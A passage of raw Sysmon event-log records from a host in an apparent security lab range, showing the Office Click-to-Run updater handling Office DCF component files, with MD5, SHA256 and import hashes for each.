Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinTree.v8.1.dllMD5=D9092DD6B5BDD6B68276FC57333E60B2,SHA256=47F4A3F5380F7106338C083C9C7E07A0FB92CE8374528ACEA6705AA0AB46316B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinTree.v11.1.dllMD5=C1C1F24BB22E6AA1F1A7416152150172,SHA256=ED6B0A3421165F2DB655D9C70236FDAD175C0F1EABC8A81C73B9AF1833BB7DE0,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.798{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinToolbars.v8.1.dllMD5=95941C315819B7F6D757B32E00CE4892,SHA256=7C6EA7275F9215A4B7C3E3528E8E101B7493348A40E0D7CB5DEF4C819BDAEE61,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.766{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinToolbars.v11.1.dllMD5=91B690FEADF95292AB8EE8B55F1BCCE6,SHA256=A9F876661D9E70FCE1F4B35BB67C042F48E88014CDB0F3D082650F49968C7D5A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.719{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinTabControl.v8.1.dllMD5=65E2E513D53E2D603A762CBCB103A9D8,SHA256=556B546B885FF24D1CB6B09B7CFFCCFDE082C56DBDADA7A4583A065F812B7C92,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071486Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.719{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinTabControl.v11.1.dllMD5=D87597C8E17D066BEDF9F504E6B4CE99,SHA256=944D9958F8A86D1EA682275AAFCA2C5719EDAF9DAB51EDE3CF062C745E8C596A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071485Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.719{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinStatusBar.v8.1.dllMD5=5D1D2B68186CCED158D152E26CAD6038,SHA256=2D37AD8FD0303C5764908776ECBB88D1D5928076AF1CFF1E6ED7A4687A03BA85,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071484Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinStatusBar.v11.1.dllMD5=80591B79DE77F57F05BA7CBE9C856257,SHA256=13C1A9C1C528B94651E1A7E5281F2464753611B19502B2F4471CCCBBB555AEF8,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071483Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.704{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinGrid.v8.1.dllMD5=CCDD4AF4AAB7B55A288A5C538B20AF95,SHA256=C9FBE30D1B08B828A06E8F02062964F05918F359CFD1939852F9919638965296,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071482Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.688{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinGrid.v11.1.dllMD5=DBD06CF680E8C5C9697B54CD53E97A74,SHA256=1C04FE49F195953E642E97B2D5058D335EC973934ED886D16319902E5A4B87B8,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071481Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.657{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinEditors.v8.1.dllMD5=9971086CACA3CDDB16BEAD52BC9EE92D,SHA256=140463E447E6C3DD773F198D49C54FEC8C74AE251D9EAD2C20C601B555358E57,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071480Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinEditors.v11.1.dllMD5=86E7BA8D5D0FC9189DD5ACB2586E3318,SHA256=F9622A7A6B56C3CA252772421E13FEA757A34729B5F815090D6F7094F6A284A5,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071479Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.641{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraWinChart.v11.1.dllMD5=E4B67E6EFA52F9B47CE28B91433E8019,SHA256=8C62794AC61D50CF145CD73AF6662B8129F0591917103B9510431DE299EDABC7,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071478Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.610{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraChart.v8.1.Design.dllMD5=AC1E2F991F9C1D4EFDC7DD23356CB976,SHA256=215067704245DE86A3116A3D324FD1F506B3C836F9FBAAADDB5F1574DFC2A1D7,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071477Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.579{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.UltraChart.v11.1.Design.dllMD5=AD9B4A58B321320ECF16F43D3E3B1FFA,SHA256=6BBD4A0A43BB7C40F85022F511EC962F956B96AC2EAA326BAEB109F463723D00,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071476Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.548{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.Misc.v8.1.dllMD5=B11320EC9CBB58C435E28D75584152DA,SHA256=0D69B14267D46F401A637D9C93D7BF4712DCD7A2123EB4790F3A151F6AEBCFD0,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071475Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.532{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Win.Misc.v11.1.dllMD5=E2F4BAE1E6FC67BF63DD27ED10B8A34D,SHA256=28AC4D99E7B800A39BAD93D478B55B50634365C9F58CB5CB96D86C15A0CBFFE4,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071474Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Infragistics2.Shared.v11.1.dllMD5=ECA37643C0FCDC79383DB17AA749CF37,SHA256=43D6D97CEF01FEB0187608A3B10296F9E57301F344C3CCCD4C0F6959DE59A4C7,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071473Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exeMD5=34F76DFBC2D44A5E5599C815714E90F0,SHA256=A86E0D9EC2CF07EBD1F32F4753A6013C1670DF177EF316B226E511CE7D025EF3,IMPHASH=0A8929F8963013186C7C70EECA81B319truetrue 23542300x800000000000000071472Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.516{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\ExcelMessageDismissal.txtMD5=FA69D6781CEC281949DBBB3B82E97642,SHA256=CB5EB0E41CC572C405707748889C308DF4B577F293A95E3B59A3F295420767A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071471Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\EmptyReport.rdlcMD5=E75DBFF1CAC35FBCA427712C7C8C8854,SHA256=85B06158C3F6DF9C4641DAC9509E2FCAD7E7EF83099C65228381743FC53D6B01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071470Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.501{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DocumentFormat.OpenXml.dllMD5=A1E6A470883B0DDC6F4039A9C336B142,SHA256=732245A34996CFD7C0F46AE924FF33F900B5D2419089EFEC9FBBD103B47CDBA1,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071469Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DcfMsoWrapper.x86.dllMD5=74F792CA8D5065D64B84AE9388E4C92A,SHA256=FE6B862DC36FBBDC237AF3D937A7A13B5A8C4D23D7CA5D558F09B44BADE71E42,IMPHASH=ED0B5FA91C4B1F740E14CAE8FB6C1CCCtruetrue 23542300x800000000000000071468Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DcfMsoWrapper.dllMD5=A7DD4F9536C0A90B2C944277E66F253F,SHA256=E64C46A44584DC49EC0B0BB20DB55F9F690A3591626502BD1BFBEFD1B609CF61,IMPHASH=4CAEAC2858F07E517B5638DD5C6DDA4Dtruetrue 23542300x800000000000000071467Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXEMD5=C7BE985A1035394A6D713B7A408BE6A9,SHA256=6100FC3813EBE06C62512BD92D58AF3B04DE46FC38A9356DE5929568BC509C84,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744truetrue 23542300x800000000000000071466Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.SqlDatabase.dllMD5=4410A047B8E88F441DA1CD7F16838F50,SHA256=31B75BA7AD7E9A8B42AF17DD0E143D1CD33234241B91318F12128D213C68D56C,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071465Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.438{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ShowHelp.exeMD5=EA2CAC092E7CB73C862B6B40FE08C641,SHA256=99843327E2CD1BBD9F5D0BC2DF83636AB4E3443017CA429814ACEF919AC28AA6,IMPHASH=AB7408DDE0E2D0440A63178373D9C710truetrue 23542300x800000000000000071464Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.PasswordManager.dllMD5=FBBB284E700A695D12CBC1538799B05F,SHA256=54F1606734489FBD722F0EEAA54D1918B175D384E970579ABFFD642FA1784D4A,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071463Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.MsoInterop.dllMD5=A6102045C3A780AC64E567D2F07CDD9A,SHA256=A8A3E20CE85563A47BF7D0236F034BF9A88FE0D6A38740A848737D6335B0AB8E,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071462Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.FileUtils.dllMD5=471E5E080E673F75C7646BE4A6470E11,SHA256=9605BC0E9FC6BE70A3D669DF42FBF1AD5F825E12265778EB04EAFE74DFD8EC0D,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071461Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.423{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ExcelServices.dllMD5=BB58F3426C7885B97CCEA30AB5A295CF,SHA256=6EFF0FF8DEBA64BABF9CFEE00BC79C9EBC276017BE28FCFAD15F37F7828AA424,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071460Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection64.exeMD5=4FD094FD523757243E81DBFAC19A6101,SHA256=716229C2C1D6F39F90912EEB600314746DA996FFE582350B2B87116FB546B840,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000071459Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DBConnection.exeMD5=6EA058256D6FC1AB24E58DC0A58820AB,SHA256=2AE09F04F350335071526ECA0C5BF40C92986D18BC7EB29E72D5F94125BEB5C4,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744truetrue 23542300x800000000000000071458Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DatabaseServices.dllMD5=7E407B3A44FAFDBBA7E443687FA6B1F1,SHA256=42F2BC8BE3A48537C67B659ED8C55CD8AFD7E2FCF12E5E6F0D2596B64CE91AEE,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071457Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.DatabaseCore.dllMD5=6D890807D748E31BA78C0973772DE00B,SHA256=4785677B8B5A9D779916A313ECD085F1E061B111FB16D586513EDD66A7791F3F,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071456Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.ClientConfiguration.dllMD5=08FE15261C0668437895308946949DF9,SHA256=231036DDDD3F1BDC29D49D68CAFEA295410DFD96036275A2D89204B230953A12,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071455Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.407{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\Common.AuditItems.dllMD5=C1E8320B51D0200A4FAB7E497931CCD4,SHA256=DAE9371EF3D139AFEC14852F3326568ED44B56EC6EC6C6992EC397C375CB6D7B,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071454Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.391{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\AccessMessageDismissal.txtMD5=30A7CA3CEDA3D36F0E3BD2B51DB0BFB4,SHA256=E5F94494CC73F6277D7E0ACA0FC0B55B9342843CCFFC1F4B51AD119AC688F54B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071453Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.391{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\AccessCompare.rdlcMD5=C1BB704380214009683C10D847FFCA27,SHA256=58E0BDC1424EF296537F22C4507F88F007A0D2B9148F49D310588FFC085055E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000071452Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.391{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\en\SpreadsheetIQ.ExcelServices.Resources.dllMD5=61F4C6B1B3EEBDE73599FE2AD8916D19,SHA256=D4640A33900318EB4F84295793E3DC486D3B08AC73DE42FFBA050727DC3F96FB,IMPHASH=DAE02F32A21E03CE65412F6E56942DAAtruetrue 23542300x800000000000000071451Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:52.391{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\vfs\ProgramFilesX86\Microsoft 